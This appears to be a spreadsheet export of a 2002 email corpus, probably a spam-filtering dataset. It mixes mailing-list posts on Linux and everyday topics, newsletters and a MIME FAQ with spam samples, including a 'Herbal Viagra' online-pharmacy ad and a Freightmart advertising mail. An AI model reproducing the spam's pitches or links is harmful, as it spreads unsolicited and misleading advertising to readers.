 &lt;table width=400 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/inv/sub_ceo.gif" width=192 height=19 alt="CEO Wealth Meter"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr bgcolor="#cccccc"&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkgqrbMJ--6oFokcTbTDoVrR" &gt;French TV exec says Vivendi tapped him for CFO &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
  A French television executive said on Tuesday he had been approached about taking over as finance chief at beleaguered media giant Vivendi Universal -- and acknowledged the job would be a "challenge."
 Jacques Espinasse, chief operating officer at French satellite TV consortium TPS, has been cited by the French press as a candidate for the financial hot seat at Vivendi, which is grappling with cash and debt problems in the wake of the sacking earlier this month of chairman Jean-Marie Messier.&lt;br&gt;&lt;B&gt;VIVENDI UNIVERSAL 15.38 -5.06% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAl5hqOPffACEH5fCAiR" &gt;Visit the CEO Wealth Meter&lt;/a&gt;&lt;br clear=all&gt;
 &lt;!-- /ceo wealth meter --&gt;
 &lt;p&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=612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width=599 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#FFFFFF"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href="http://clickthru.online.com/Click?q=25-inepIbdXXmgT9-OZTscR7jeQrFPR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8bZfix7JR1rqAFZcCnR" &gt;&lt;b&gt;Digital photography starter kit&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;This guide to digital photos will show you the best products to take your images from snap to finish.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vQD4jv8g-rrsLKFK0uR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZ0dIfsNGWF8w6YrPhsR" &gt;Minolta"s 4-megapixel Dimage F100&lt;/a&gt;&lt;br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href="http://clickthru.online.com/Click?q=79-rsQHIEBf9L2XNnwmFz_e0CvgpaFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTtNI4tPDuYWD0V_Wy4R" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6pafXa5wrq463LvvI2rgYyR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXLuUAYh8FdMkmoOwzlR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOozpVYZ3ufz1Jey2fP4R" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8ASTim3-JM2mPpt29erR"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&lt;/td&gt;&lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=f8-57BSQfsXnXRqAf3piaRL6DCwoliR" &gt;
       &lt;/a&gt;
       &lt;table width="100%" border="0" cellpadding="5" align="center" bordercolor="#000000" bgcolor="#CCCCCC"&gt;
         &lt;tr bgcolor="#ffcc00"&gt;
           &lt;td bgcolor="#CCCCCC"&gt;&lt;font face="Arial, Helvetica" size=-1&gt;&lt;b&gt;&lt;font size="2" color=blue&gt;NEW!&lt;/font&gt;&lt;/b&gt;
             &lt;font size="2"&gt;CNET professional e-mail publishing for just $24.95/month.
             &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGSAqjfNv0T0QkY6b7PR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_FCVX0uo4I9yc99NcnR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=38-bL1mzdM6ESXNckCEuJP4Z-nwcb_HPdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDjxn-JUQdaB0S22bbKAZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOEd44dG9TmIKJ15BRdR" &gt;Advertise&lt;/A&gt;&lt;p&gt;
 Please send any questions, comments, or concerns to&amp;nbsp;&lt;a href="mailto:dispatchfeedback@news.com"&gt;dispatchfeedback@news.com&lt;/A&gt;.&lt;br&gt;&lt;/font&gt;
 &lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;img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href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMgNe70x31g9NPmdZPuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhMU1tkNVFm8il40AWNyR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKI25MMceGkeHaXeD3gBlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyZLn1jc5T_PUCch20Lg4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-7pF0qGyXYHRf_uaHkrR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDHKmkSSw7kPhB7mxUT9AiR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=f8-57ES-QsQKTrbF_GI6V9WiKXfedRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">They are legally required to do that.  I got a similar check because an
 insurance company didn't pay a claim quickly enough.  It might have been
 $.02.
 Although they spent lots more than $.33 to mail you the check, the
 alternative seems to be to keep the money.  Do you really want companies
 to have a financial incentive to over-bill you 'just a bit' so they
 could keep it?  For a company with millions of customers, $.33/customer
 starts adding up.
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; bitbitch@magnesium.net
 &gt; So I get a check from Pac Bell today (SBC as they're called now).
 &gt; Turns out, they went to the trouble of printing out, signing, sealing
 &gt; and stamping a check just to refund me for a whole $0.33.
 &gt; 
 &gt; They easily spent more than this just getting the materials together.
 &gt; Why the hell do companies bother to do this crap?  I mean, isn't there
 &gt; a bottom line in terms of cost effectiveness?  I don't think I missed
 &gt; the .33, but I sure as hell would have appreciated lower rates in lieu
 &gt; of being returned pennies.
 &gt; 
 &gt; I'm truly stuck on this though.  I don't know whether to frame the
 &gt; check, burn it, or cash it in.  Maybe I should find a way to return to
 &gt; sender, so they have to spend -more- money on giving me my .33 dues.
 &gt; 
 &gt; 
 &gt; Does .33 even buy anything anymore?  Funny bit of it, is I couldn't
 &gt; even make a phone call these days.
 &gt; 
 &gt; *boggled*
 &gt; BB.
 &gt; 
 &gt; --
 &gt; Best regards,
 &gt;  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;ViaPro&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#FFFFFF"&gt;
 &lt;CENTER&gt;&lt;TABLE BORDER=3D"0" CELLPADDING=3D"0" CELLSPACING=3D"0" WIDTH=3D"5=
 02"&gt;
 &lt;TR&gt;
 &lt;TD VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.bigpharmacy.net/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.bigpharmacy.net/mail/1_1.jpg" WIDTH=3D"226" HEIGHT=3D=
 "183" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;TD VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.bigpharmacy.net/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.bigpharmacy.net/mail/2_1.gif" WIDTH=3D"276" HEIGHT=3D=
 "183" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD COLSPAN=3D"2" VALIGN=3DTOP&gt;
 &lt;a href=3D"http://www.bigpharmacy.net/v609.html"&gt;
 &lt;IMG SRC=3D"http://www.bigpharmacy.net/mail/1_1-2.gif" WIDTH=3D"502" HEIGH=
 T=3D"126" BORDER=3D"0"&gt;&lt;/a&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p align=3D"cent=
 er"&gt;
 &lt;a href=3D"http://www.bigpharmacy.net/service.html"&gt;exit list instructions=
 &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ajrule
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Jakma wrote:
 &gt; On Tue, 27 Aug 2002, David Neary wrote:
 &gt; 
 &gt; &gt; &gt; Actually the following would be in some way sensible:
 &gt; &gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
 &gt; &gt; 
 &gt; &gt; Why {2,2}? Why not {2}?
 &gt; 
 &gt; the above was something along the lines i was attempting, once i 
 &gt; realised it was a straight swap. but i couldnt get awk's gensub to 
 &gt; insert the \x for %'s and ='s.
 Perl's pack() would do the job...
 &gt; &gt; PS the late reply is because the footer on the original mail (If
 &gt; &gt; you received this mail in error yadda yadda) got caught in my
 &gt; &gt; spam filter, and ended up in my junkmail directory.
 &gt; 
 &gt; might not have been the footer - check my headers. :)
 Actually, it was worse - a bodycheck showed up a "remove" URL. I
 need a new spam filter (but I want to be able to process false
 positives, rather than dump them).
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The MIME information you requested (last changed 3154 Feb 14)
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------------------------------------------------------------------
 What is MIME?
 MIME stands for "Multipurpose Internet Mail Extensions".  It is the
 standard for how to send multipart, multimedia, and binary data using the
 world-wide Internet email system.  Typical uses of MIME include sending
 images, audio, wordprocessing documents, programs, or even plain text
 files when it is important that the mail system does not modify any part
 of the file.  MIME also allows for labelling message parts so that a
 recipient (or mail program) may determine what to do with them. 
 How can I read a MIME message?
 Since MIME is only a few years old, there are still some mailers in use
 which do not understand MIME messages.  However, there are a growing
 number of mail programs that have MIME support built-in.  (One popular
 MIME-capable mailer for Unix, VMS and PCs is Pine, developed at the
 University of Washington and available via anonymous FTP from the host
 ftp.cac.washington.edu in the file /pine/pine.tar.Z)
 In addition, several proprietary email systems provide MIME translation
 capability in their Internet gateway products.  However, even if you do
 not have access to a MIME-capable mailer or suitable gateway, there is
 still hope! 
 There are a number of stand-alone programs that can interpret a MIME
 message.  One of the more versatile is called "munpack".  It was developed
 at Carnegie Mellon University and is available via anonymous FTP from the
 host ftp.andrew.cmu.edu in the directory pub/mpack/.  There are versions
 available for Unix, PC, Mac and Amiga systems.  For compabibility with
 older forms of transferring binary files, the munpack program can also
 decode messages in split-uuencoded format. 
 Does MIME replace UUENCODE?
 Yes.  UUENCODE has been used for some time for encoding binary files so
 that they can be sent via Internet mail, but it has several technical
 limitations and interoperability problems.  MIME uses a more robust
 encoding called "Base64" which has been carefully designed to survive the
 message transformations made by certain email gateways. 
 How can I learn more about MIME?
 The MIME Internet standard is described in RFC-1521, available via
 anonymous FTP from many different Internet hosts, including: 
      o  US East Coast                            
         Address:  ds.internic.net (198.49.45.10)        
      o  US West Coast                            
         Address:  ftp.isi.edu (128.9.0.32)      
      o  Pacific Rim                              
         Address:  munnari.oz.au (128.250.1.21)  
      o  Europe                                   
         Address:  nic.nordu.net (192.36.148.17) 
 Look for the file /rfc/rfc1521.txt
 Another source of information is the Internet news group "comp.mail.mime",
 which includes a periodic posting of a "Frequently Asked Questions" list.
 --------------------------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 13 Aug 2002, wintermute wrote:
 &gt; There are as far as I know, no Linux kernel hackers, nor distros
 &gt; that originate from this fair island right? Right.
 there are at least 3 irish kernel hackers (active/inactive) on this
 list.
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 	warning: do not ever send email to spam@dishone.st
 Fortune:
 Let the people think they govern and they will be governed.
 		-- William Penn, founder of Pennsylvania
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I know this is simple but do you have /usr/src/linux and
 /usr/src/linux-2.4 symlinked to your kernel source directory?  Also is
 there a .config in /usr/src/yourkernelsource/.config  ?
 On Fri, 2002-08-30 at 21:56, Ben Liblit wrote:
 &gt; I am trying to rebuild the recently posted ALSA driver package for my 
 &gt; kernel.  Although I run Red Hat 7.3, I am not using a Red Hat kernel 
 &gt; package: my kernel is lovingly downloaded, configured, and built by 
 &gt; hand.  Call me old fashioned.
 &gt; 
 &gt; Sadly, the RPM rebuild fails part way through:
 &gt; 
 &gt;      % rpm --rebuild alsa-driver-0.9.0rc3-fr6.src.rpm
 &gt; 
 &gt;      gcc -DALSA_BUILD -D__KERNEL__ -DMODULE=1 \
 &gt;      -I/usr/src/redhat/BUILD/alsa-driver-0.9.0rc3/include \
 &gt;      -I/lib/modules/2.4.18/build/include -O2 \
 &gt;      -mpreferred-stack-boundary=2 -march=i686 -DLINUX -Wall \
 &gt;      -Wstrict-prototypes -fomit-frame-pointer -pipe   -DEXPORT_SYMTAB \
 &gt;      -c sound.c
 &gt; 
 &gt;      sound.c:41: `snd_hack_usb_set_interface' undeclared here (not in a \
 &gt;      function)
 &gt; 
 &gt;      sound.c:41: initializer element is not constant
 &gt; 
 &gt;      sound.c:41: (near initialization for \
 &gt;      __ksymtab_snd_hack_usb_set_interface.value')
 &gt; 
 &gt;      make[1]: *** [sound.o] Error 1
 &gt; 
 &gt; The line in question looks like this:
 &gt; 
 &gt; 	/* USB workaround */
 &gt; 	#if LINUX_VERSION_CODE &lt; KERNEL_VERSION(2, 5, 24)
 &gt; 	#if defined(CONFIG_SND_USB_AUDIO) || \
 &gt; 	defined(CONFIG_SND_USB_AUDIO_MODULE) || \
 &gt; 	defined(CONFIG_SND_USB_MIDI) || \
 &gt; 	defined(CONFIG_SND_USB_MIDI_MODULE)
 &gt; -41-&gt; 
 &gt; EXPORT_SYMBOL(snd_hack_usb_set_interface);
 &gt; 	#endif
 &gt; 	#endif
 &gt; 
 &gt; Any suggestions?
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Finding out files larger than given size       LOST #324
 To find out all files in a dir over a given size, try:
 find /path/to/dir_of_file -type f -size +Nk
 [Where N is a number like 1024 for 1mb, and multiples thereof] 
 ####[Discussions on LIH : 04 Jul 2002]########################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ABѪͣһԸߣ롣
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --#MYBOUNDARY#
 Content-Type: text/html; charset=GB2312
 Content-Transfer-Encoding: base64
 X-MIME-Autoconverted: from 8bit to base64 by hq.pro-ns.net id g6N439hX076203
 ttTSu7j20aqwqbKhyMu6zbzSyvTF89PRtvjR1KOsyrG85NK7t9bSu8Prtdi5/cilo6zUvcHu
 yMu6psXCoaMgDQrO0sPHvLHQ6NKq0rvOu9Gq0M1BQtDNtcS5x8vovujU+dXfy+TIu9a709Cw
 2c3yt9bWrtK7tcS7+rvho6zS8s6qxPq1xLTIsa/T67TzsK6jrMv9ssXT0LvuIA0Kz8LIpbXE
 z6PN+6GjIA0Kx+vJ7LP2xPq1xNSuytbT687Sw8fBqsLn0rLH68T6v8nS1L2r1eK34tDF1NnX
 qrzEuPjE+rXEx9fF87rD09HDxyzQu9C7oaMgDQoNCrjQvKSyu76ho6EgRXJpYyBIdWkgVGVs
 OiAoODUyKS0yNDI2LTYwNzMgKE9mZmljZSk7ICg4NTIpLTkxODEtMjA4MyAoTW9iaWxlKSAN
 Cg0K08PX1Ly6tcTSu7fd0NC2r6Oszey+yNbQu6rD8dfltcTV+7j21+W356OsyMPX1Mu9oaLM
 sMC3oaLDu9PQDQrIy9DUtci28c+wtNPW0Ln6yMvJ7cnPz/vKp6GjDQoNCsHtu8a6o7ar0r3K
 pr60uOa087zSo6zI57n709BBQtGq0M3V36Osv8nAtNDFwLS156OsyLu689TZwarPtcnPuqO5
 x8vov+LF5NDNo6hITEG31tDNo6mhoyANCsjnufu087zS09DJz7qj1tDQxNGq1b678snPuqPW
 0LuqucfL6L/itcTN+Na3u/K157uwv8nS1L6hv+zBqs+1oaPB7c3io6y4+b7d1K3Qxbz+tcS1
 57uwusUgDQrC66Osu7zV37/JxNzOqs/juNvIy6Osy/nS1MjnufvT0LnjtqvF89PRo6zH676h
 wb/Xqrjmo6zV4tH5v8nS1NT2vNPF5NDNtcSzybmmwsqho9C70LuhoyANCg0KDQo=
 --#MYBOUNDARY#--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</si>
  <si>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Justification could be "This user has a great track record", he 
 has agreed with me every single time out of hundreds of times in 
 the past.
 C
 On Monday, August 12, 2002, at 11:42  AM, Jehan wrote:
 &gt; And I also think that people listen more to people justifying 
 &gt; their argumentation than people just giving a result. But 
 &gt; justification will never work in Razor.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</si>
  <si>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An Invitation to Advertise on Freightmart!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;FREIGHTMART Mail Campaign&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;DIV align="center"&gt;
 	&lt;a href="http://www.freightmart.com"&gt;&lt;img src="http://www.freightmart.com/images/ads/emailcampaign.gif" alt="" border="0"&gt;&lt;/a&gt;
 	&lt;br&gt;&lt;br&gt;&lt;a href="http://www.freightmart.com"&gt;FREIGHTMART.COM - Ship Anything...Anywhere...Anytime...Auction Style!&lt;/a&gt;
 	&lt;br&gt;&lt;br&gt;&lt;a href="mailto:lisa@freightmart.com?subject=Need More Info"&gt;Need More Info?&lt;/a&gt;&amp;nbsp;|&amp;nbsp;
 	&lt;a href="http://www.freightmart.com/getTemplate.cfm?Id=25"&gt;If you're a Shipper&lt;/a&gt;&amp;nbsp;|&amp;nbsp;
 	&lt;a href="http://www.freightmart.com/getTemplate.cfm?Id=26"&gt;If you're a Forwarder&lt;/a&gt;
 	&lt;br&gt;&lt;br&gt;To be &lt;b&gt;REMOVED&lt;/b&gt; from any future offers, simply &lt;a href="mailto:remove@freightmart.com?subject=REMOVE"&gt;CLICK HERE!&lt;/a&gt;
 &lt;/DIV&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Neat Net Tricks Standard Issue #138, December 1, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">IN THIS ISSUE:
 01. Readers write
 02. Extension search
 03. Dumb messages revisited
 04. XP Tweak
 05. Hardware Diagnostic Tool
 06. Training Windows
 07. Hold that button
 08. Hagai's freeware
 09. Online help
 And Coming Next Week!
 &lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;
 Make Internet Explorer Faster, More Capable, and Secure! 
 NNT's reviewers called Secure IE great, easy-to-use,awesome,
 impressive, a total "thumbs up"!  Read what they're raving 
 about and get yours at http://www.secureie.com/p/nnt1/
 &lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;
 01. READERS WRITE.  A Wisconsin subscriber wrote to express his displeasure 
 with the links contained in Neat Net Tricks.  It seems he is bothered by 
 the frequent pop-up ads and he felt that only those sites without the ads 
 should be featured in NNT, particularly in the Premium issue. We replied 
 that pop-ups can be annoying but, while not defending them, we must realize 
 that they are a form of marketing in which the site owner hopes to recover 
 his costs and possibly make a profit.  We suggested using a pop-up stopper 
 (there are lots of them on the Web) and ALT F4 will quickly close active 
 pop-up windows.  Finally, we pointed out that no publication can guarantee 
 only sites without pop-up ads.  As we've often said in the past, the 
 Internet isn't free and never was.  Someone has to pay the freight and if 
 those ads are unprofitable, they will cease to exist.
 02. EXTENSION SEARCH.  Next time a file extension has you puzzled, try the 
 database at http://extsearch.com/ information.
 03. DUMB MESSAGES REVISITED.  Not long ago we mentioned a few dumb messages 
 we see from our computer and invited others to share their favorite 
 "dumbness."  A reader frequently gets a banner ad that asks "Do you click 
 on banner ads."  She asks, if you don't, how do you click "No" without 
 clicking on the banner ad? Others galled at their computers crashing, then 
 sitting through the Scandisk operation and being reminded "To avoid seeing 
 this screen again, always shut down Windows properly" as if it was their 
 fault. Another reader nominates the download site at 
 http://www.microsoft.com/NTWorkstation/downloads/PowerToys/Networking/NTTweakUI.asp 
 for having a really dumb comment.  After downloading a Windows update, it 
 says:  "How to Get Started -- You don't need to do anything after 
 downloading" and he asks, "what's the point of downloading?"  Still another 
 reader nominates the instruction manual for the Windows Internet 
 Information Server (ILS) accessible only when ILS is operating.  Thus, the 
 entire section on troubleshooting a nonfunctional installation is 
 inaccessible at precisely the moment one needs to consult it.  But judging 
 by the sheer quantity of email, the top dumb instruction has to be the 
 message that "Keyboard not detected, Press (whatever key) to 
 Continue."  Keep them coming and we'll do it again in a future issue!
 04. XP TWEAK.  A recent article reminded readers of the neat things that 
 can be done with TweakUI, but the XP operating system was not supported by 
 the Tweak at that link.  Never fear, XP folks, you'll find a whole array of 
 power tools included Tweak - all for XP - at 
 http://www.microsoft.com/windowsxp/pro/downloads/powertoys.asp .
 . . . . .
 1, 400+ Neat Net Tricks tips updated 4 times yearly for the word processing 
 format of your choice, also in ebook format, plus extra features, 
 downloadable and just $20 a year, a bargain (and a nice stocking stuffer 
 for Santa) at http://www.NeatNetTricks.com/store.
 . . . . .
 05. HARDWARE DIAGNOSTICS TOOL.  Windows98 users have a neat tool at their 
 fingertips without downloading.  Click on Start and Run and enter "hwinfo 
 /ui" without quotes.  The information displayed is color-coded.  Error 
 messages are in red, warnings are in blue.  Green denotes registry entries, 
 Configuration Manager information is in brown and file attributes are shown 
 in magenta.
 06. TRAINING WINDOWS.  One pet peeve is Windows' determination to identify 
 a shortcut icon as "Shortcut to (whatever)"  This is pure redundancy, since 
 shortcuts are identified by an arrow.  And, with the added verbage of 
 "Short cut to" you can't jump from one icon to another by pressing the 
 first letter (since they would all start with an "s".  If you keep removing 
 "Shortcut to," Windows will eventually understand your intent and future 
 shortcuts won't include "Shortcut to".
 07. HOLD THAT BUTTON.  The site at http://www.holdthebutton.com/ invites 
 you to hold the mouse key down.  Now, before you hastily jump to 
 conclusions that there's nothing more to this site, when you release the 
 button, you are told how you rank in stamina with other button 
 holders.  And when I took my turn at the controls, I found that the longest 
 record was a little over six hours, proving once again that some folks need 
 to get a life.
 08. HAGAI'S FREEWARE.  A baker's dozen (13) freeware programs are at 
 http://www.hagai.com/download.asp?ProgType=Freeware . They include a bug 
 checker, screen saver loader, clock, shutdown utility, CD autorun, boot 
 editor, menu, counter,icon viewer and editor, and more.
 09. ONLINE HELP.  Of limited scope, but considering that you can never get 
 enough help with your computer, try http://www.computerhope.com/oh.htm .
 . . . . .
 Apologies to those readers who were inconvenienced with multiple issues of 
 NNT Issue #137.  As luck would have it, Lyris (our mail server) had 
 hardware failure causing some of the repeated distribution. We'd like to 
 tell you that there will never be another problem in future mailings, and 
 if you'll buy that, as the song goes, we have some oceanfront property in 
 Arizona for sale.
 . . . . .
 IN NEXT WEEK'S NEAT NET TRICKS PREMIUM:  Google is generally accepted as 
 the most popular search engine, but we show you another free download that 
